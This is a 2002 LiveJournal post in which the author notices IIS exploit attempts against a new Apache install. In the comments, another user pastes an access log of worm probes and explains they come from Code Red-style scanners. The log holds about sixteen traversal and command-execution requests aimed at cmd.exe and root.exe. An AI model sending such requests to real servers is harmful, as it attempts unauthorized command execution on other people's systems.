bluebeard: holy crap, a face pic (Default)
[personal profile] bluebeard
tonight I setup apache-win32 so I could test some stuff without having to ssh into my brother's box. being stupid, I didn't tell it right off the bat not to accept non-local connections.

within an hour three different people tried to use IIS exploits to get at my c: drive. of course, since it's apache, whatever lame little scripts they're running didn't work.

are people -that- fucking bored?

after a glorious week of sleeping midnight-~8am, here I am, not able to sleep again. wheee

(no subject)

Date: 2002-07-04 10:55 pm (UTC)
From: [identity profile] abiku.livejournal.com
It's very likely that it wasn't "people" probing your computer, but the Code Red virus, or variants thereof -- they automatically scan neighboring netblocks and my weblogs are chock full of them. Here's an example of a single scan from one infected computer:

63.228.51.121 - - [22/Sep/2001:22:20:06 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:06 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"

(no subject)

Date: 2002-07-05 12:34 am (UTC)
From: [identity profile] dom-ino.livejournal.com
As a matter of fact, that could very well be a copy of part of my access.log.

I have been educated. ;)

Profile

bluebeard: holy crap, a face pic (Default)
bluebeard

July 2009

S M T W T F S
   1234
5678910 11
12131415161718
19202122232425
262728293031 

Style Credit

Expand Cut Tags

No cut tags